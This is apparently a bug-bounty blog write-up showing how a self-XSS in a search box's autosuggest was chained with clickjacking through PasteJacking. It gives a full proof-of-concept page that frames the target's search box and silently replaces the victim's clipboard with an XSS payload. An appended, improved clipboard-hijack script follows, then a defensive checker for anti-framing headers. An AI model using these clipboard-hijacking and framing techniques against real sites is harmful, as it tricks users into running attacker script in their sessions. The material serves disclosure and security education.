<h1>Cross Site Scripting for Fun: PasteJacking</h1>
<p><em>Published 2017-11-17 at <a href="https://www.geekboy.ninja/blog/cross-site-scripting-for-fun-pastejacking/">https://www.geekboy.ninja/blog/cross-site-scripting-for-fun-pastejacking/</a></em></p>
<p>Hi Everyone,</p>
<p>A few weeks ago I found an issue which initially looked unexploitable: it was <strong>Self XSS</strong> again, this time in a <strong>Search Box</strong> where users can search for books/documents. The XSS gets triggered as soon as we type/paste our payload into the search box, via the application's AutoSuggestion feature, but once the search is submitted it gets blocked by a WAF at the backend. So the only way to trigger the XSS was the AutoSuggestion feature, which can only be done by the user himself, so we can't do anything fancy here like <a href="https://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/">THIS</a>.</p>
<p><strong>Possible Exploitation?</strong></p>
<p>Chaining this with <strong>ClickJacking</strong>, right? I was lucky enough, as the application had a strange behaviour: it set <strong>X-Frame-Options</strong> for non-authenticated users but not for authenticated users.</p>
<p><em>TIP: Check the anti-framing headers (<strong>X-Frame-Options</strong>, and CSP <strong>frame-ancestors</strong>) on every part of the application, and in both the logged-out and the logged-in state. A page can be protected in one state and frameable in the other, which is exactly what happened here.</em></p>
<p>So I checked all the possible and more convincing ways to chain this, and here are some ways we can do it.</p>
<ul>
<li><strong>Copy Paste</strong></li>
<li><strong>Drag and Drop</strong></li>
<li><strong>PasteJacking</strong></li>
</ul>
<p><span style="text-decoration: underline;"><em><strong>Copy Paste:</strong></em></span></p>
<p>In this, we simply ask the victim to copy the payload from our hosted page and paste it into the framed page. This is not very convincing, because the victim sees the raw payload before pasting it.</p>
<p><span style="text-decoration: underline;"><em><strong>Drag and Drop:</strong></em></span></p>
<p>In this, we hide our payload behind an image or some other draggable object and convince the victim to drag and drop it onto the framed input. This is a good vector indeed, but it didn't work in my case, as typing or pasting is the only way to trigger the XSS.</p>
<p><strong>Reference:</strong></p>
<ol>
<li><a href="http://c0rni3sm.blogspot.in/2016/04/drag-drop-xss-in-google.html" rel="noopener">http://c0rni3sm.blogspot.in/2016/04/drag-drop-xss-in-google.html</a></li>
<li><a href="https://vishwarajbhattrai.wordpress.com/2016/02/04/exploiting-self-xss/" rel="noopener">https://vishwarajbhattrai.wordpress.com/2016/02/04/exploiting-self-xss/</a></li>
<li><a href="https://gist.github.com/vishwaraj/340435945e61027009133b4e11283750" rel="noopener">Python script to generate a PoC</a> for Drag and Drop XSS.</li>
</ol>
<p><em><span style="text-decoration: underline;"><strong>PasteJacking</strong></span></em></p>
<p>This is what I used for my submission, and it is quite convincing in my view. Here <strong>we can control the victim's clipboard via JavaScript</strong>: once the victim copies something from our page (the copied object can be anything), the attacker can put anything on the victim's clipboard, so I set it to the XSS payload. Concretely, the PoC below listens for the victim's copy keystroke, waits a moment so the browser's own copy finishes first, then writes the payload into a hidden <code>textarea</code>, selects it and calls <code>document.execCommand('copy')</code>. When the victim pastes into the framed search box, the payload lands there instead of the text they thought they copied, and the AutoSuggestion feature fires it.</p>
<p><strong>Reference:</strong></p>
<p>1. <a href="https://github.com/dxa4481/Pastejacking" rel="noopener">https://github.com/dxa4481/Pastejacking</a></p>
<p>So I decided to choose <strong>PasteJacking</strong> to exploit this <strong>Self-XSS</strong>, and this is how it looks:</p>
<p><a href="http://www.geekboy.ninja/blog/wp-content/uploads/2017/11/CJ-XSS.png"><img class="aligncenter size-full wp-image-516" src="http://www.geekboy.ninja/blog/wp-content/uploads/2017/11/CJ-XSS.png" alt="ClickJacking Lottery Game PoC page" width="491" height="471" /></a></p>
<p><em>TIP: You can use <a href="http://samy.pl/quickjack/quickjack.html" target="_blank" rel="noopener">http://samy.pl/quickjack/quickjack.html</a> for framing/slicing the desired section of the target page.</em></p>
<p><strong>PoC Code:</strong></p>
<pre class="lang:default decode:true">&lt;html&gt;
&lt;head&gt;&lt;title&gt;ClickJacking Lottery Game POC&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;&lt;center&gt;
&lt;h1&gt;ClickJacking Lottery Game&lt;/h1&gt;

&lt;b&gt;&lt;p&gt;Can you copy me ?&lt;/p&gt;&lt;/b&gt;
&lt;script&gt;
// Put arbitrary text on the clipboard. Browsers only honour
// execCommand('copy') inside a user-initiated event, which is why this
// is called from the keydown handler below.
function copyTextToClipboard(text) {
  var textArea = document.createElement("textarea");

  // Keep the helper textarea tiny, fixed in the top-left corner and
  // invisible, so that if it ever renders (e.g. while IE shows its
  // clipboard permission prompt) the victim does not notice the payload
  // being selected. It still has to be in the DOM to take focus/selection.
  textArea.style.position = 'fixed';
  textArea.style.top = 0;
  textArea.style.left = 0;
  textArea.style.width = '2em';   // 1px / 1em gives a negative size in some browsers
  textArea.style.height = '2em';
  textArea.style.padding = 0;
  textArea.style.border = 'none';
  textArea.style.outline = 'none';
  textArea.style.boxShadow = 'none';
  textArea.style.background = 'transparent';

  textArea.value = text;
  document.body.appendChild(textArea);
  textArea.select();

  try {
    var successful = document.execCommand('copy');
    var msg = successful ? 'successful' : 'unsuccessful';
    console.log('Copying text command was ' + msg);
  } catch (err) {
    console.log('Oops, unable to copy');
  }

  document.body.removeChild(textArea);
}

// Fires on any keystroke: the victim is pressing Ctrl+C on "Can you copy
// me ?". Busy-wait about 100 ms so the browser's own copy completes first,
// then overwrite the clipboard with the XSS payload.
document.addEventListener('keydown', function(event) {
  var ms = 100;
  var start = new Date().getTime();
  var end = start;
  while (end &lt; start + ms) {
    end = new Date().getTime();
  }
  copyTextToClipboard('&lt;img src=x onerror=confirm(document.domain)&gt;');
});
&lt;/script&gt;

&lt;!-- Frame slice generated with quickjack: only the target's search box
     (a 304x38 px window onto the 1920x971 px framed page) stays visible --&gt;
&lt;script&gt;function t(e){window.setTimeout("stop();",10);}window.onbeforeunload=t;var frames=new Array();&lt;/script&gt;
&lt;div qjid="quickjack" style="overflow: hidden; width: 304px; height: 38px; position: relative;" id="cksl6"&gt;
&lt;iframe name="cksl7" src="https://www.target.com/home" style="border: 0pt none ; left: -875px; top: -8px; position: absolute; width: 1920px; height: 971px;" scrolling="no"&gt;&lt;/iframe&gt;&lt;/div&gt;
&amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &amp;#8593; &lt;br&gt;&lt;br&gt;
&lt;b&gt;Paste here to WIN :) &lt;/b&gt;
&lt;/center&gt;&lt;/body&gt;
&lt;/html&gt;</pre>
<p><strong>Limitations:</strong></p>
<p>For exploiting issues similar to this, the page that hosts the self-XSS must be frameable, i.e. vulnerable to ClickJacking (no effective <code>X-Frame-Options</code> or CSP <code>frame-ancestors</code> in the state the victim is in), and the victim must be persuaded to copy something from the attacker's page and paste it into the framed input. The payload only runs when the victim performs that paste themselves.</p>
<p>Do let me know in the comments if you have exploited similar issues in more interesting ways. For any query, comment or <a href="https://twitter.com/emgeekboy">tweet</a> it, and yes: <strong>don't copy-paste anything from the internet blindly</strong>.</p>
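<p>The clipboard overwrite from the PoC above, rewritten as an added example (my code, not the post's PoC and not code from the dxa4481/Pastejacking repository): instead of guessing when the victim's Ctrl+C has finished with a 100 ms busy-wait and then calling <code>execCommand('copy')</code>, the page handles the <code>copy</code> event itself and writes the payload straight into <code>event.clipboardData</code>, which removes the race. <code>PAYLOAD</code> and the decoy string are assumed values matching the PoC page, and <code>fakeClipboardEvent</code> is a constructed stand-in for the browser's <code>ClipboardEvent</code> so the logic can be exercised outside a browser.</p>

```javascript
// Added example, not the post's PoC: overwrite the clipboard from the `copy`
// event instead of keydown + busy-wait + execCommand('copy'). PAYLOAD and
// DECOY are assumed values chosen to match the PoC page.
const PAYLOAD = '<img src=x onerror=confirm(document.domain)>';
const DECOY = 'Can you copy me ?';

// Handler for the `copy` event. Writes `payload` into the clipboard and
// cancels the browser's default copy, so the selected decoy text never gets
// there. Returns what was placed on the clipboard, or null if the engine has
// no clipboardData (the old execCommand('copy') path would be needed then).
function hijackCopy(event, payload) {
  if (!event.clipboardData) {
    return null;
  }
  event.clipboardData.setData('text/plain', payload);
  event.preventDefault();
  return payload;
}

// Constructed stand-in for a browser ClipboardEvent so the handler can be
// exercised outside a browser: it records setData() calls and whether the
// default action was cancelled, and reports what a later paste would yield.
function fakeClipboardEvent(selectedText) {
  const data = {};
  let prevented = false;
  return {
    clipboardData: {
      setData: (type, value) => { data[type] = value; },
      getData: (type) => data[type] || '',
    },
    preventDefault: () => { prevented = true; },
    // Browser semantics: setData() only sticks if the default copy (which
    // would store the current selection) is cancelled.
    pastedText: () => (prevented ? (data['text/plain'] || '') : selectedText),
  };
}

// Simulate the victim copying the decoy on the attacker's page and return
// the text that would come out when they paste into the framed search box.
function simulateVictimCopy(handler = (e) => hijackCopy(e, PAYLOAD)) {
  const ev = fakeClipboardEvent(DECOY);
  handler(ev);
  return ev.pastedText();
}

if (typeof document !== 'undefined') {
  // In a real browser: arm the handler on the whole page, as the PoC does.
  document.addEventListener('copy', (e) => hijackCopy(e, PAYLOAD));
}
```

<p>The <code>copy</code> event is the reliable trigger because it runs inside the user gesture, the same constraint the PoC's keydown listener satisfies, but it fires exactly once per copy and does not depend on timing. If the victim copies nothing, nothing happens, which is the same limitation the post states.</p>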
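<p>A check for the TIP and the Limitations section, as an added example that is not part of the original post: given the response headers of the same URL fetched logged-out and logged-in, decide whether each response can be framed from the attacker's origin (honouring CSP <code>frame-ancestors</code> over <code>X-Frame-Options</code>, as browsers do) and flag the mismatch the post describes. The attacker origin, the target origin <code>https://www.target.com</code> (the placeholder used in the PoC) and the two header sets are constructed for the example; in practice feed it the headers captured from two real sessions.</p>

```javascript
// Added example, not from the original post: evaluate anti-framing headers
// for a page at selfOrigin being framed from `origin`. ATTACKER and the
// sample header maps below are assumed/constructed values.
const ATTACKER = 'https://evil.example';

// Parse a Content-Security-Policy value into { directive: [sources] }.
function parseCsp(value) {
  const out = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) out[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return out;
}

// Does one frame-ancestors source expression permit `origin`?
function sourceAllows(src, origin, selfOrigin) {
  const s = src.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return origin === selfOrigin;
  const o = new URL(origin);
  if (s.endsWith(':')) return o.protocol === s;            // scheme-source, e.g. https:
  const host = s.replace(/^[a-z][a-z0-9+.-]*:\/\//, '');   // host-source, optional scheme
  if (host.startsWith('*.')) return o.hostname.endsWith(host.slice(1));
  return o.host === host || o.hostname === host;
}

// Header keys are expected lower-cased, as Node's http/fetch return them.
// Returns { frameable, reason }.
function frameable(headers, origin, selfOrigin) {
  const csp = headers['content-security-policy'];
  if (csp) {
    const fa = parseCsp(csp)['frame-ancestors'];
    if (fa) {
      // CSP3: frame-ancestors takes precedence over X-Frame-Options.
      const ok = fa.some((src) => sourceAllows(src, origin, selfOrigin));
      return { frameable: ok, reason: 'frame-ancestors ' + fa.join(' ') };
    }
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { frameable: false, reason: 'X-Frame-Options: DENY' };
  if (xfo === 'SAMEORIGIN') {
    return { frameable: origin === selfOrigin, reason: 'X-Frame-Options: SAMEORIGIN' };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // Obsolete; Chromium-based browsers never honoured it and treat it as
    // invalid, i.e. no protection. Report it as frameable, with the reason.
    return { frameable: true, reason: 'X-Frame-Options: ALLOW-FROM (not honoured by modern browsers)' };
  }
  return { frameable: true, reason: 'no anti-framing header' };
}

// Compare the two sessions the way the post describes: protection present
// for anonymous users but missing once logged in.
function compareStates(unauthHeaders, authHeaders, origin, selfOrigin) {
  const a = frameable(unauthHeaders, origin, selfOrigin);
  const b = frameable(authHeaders, origin, selfOrigin);
  return { unauthenticated: a, authenticated: b, inconsistent: a.frameable !== b.frameable };
}

// Constructed sample responses mirroring the finding in the post.
const SAMPLE_UNAUTH = { 'x-frame-options': 'DENY' };
const SAMPLE_AUTH = { 'set-cookie': 'session=abc; HttpOnly' }; // no XFO, no CSP

function demo() {
  return compareStates(SAMPLE_UNAUTH, SAMPLE_AUTH, ATTACKER, 'https://www.target.com');
}

console.log(JSON.stringify(demo(), null, 2));
```

<p>Run it with <code>node</code>; <code>inconsistent: true</code> is the condition worth reporting, since a page that is frameable only in the authenticated state is the one a PasteJacking chain like the above needs. Because CSP wins over <code>X-Frame-Options</code>, a <code>frame-ancestors 'none'</code> next to an <code>ALLOW-FROM</code> value is still safe, and the function reflects that.</p>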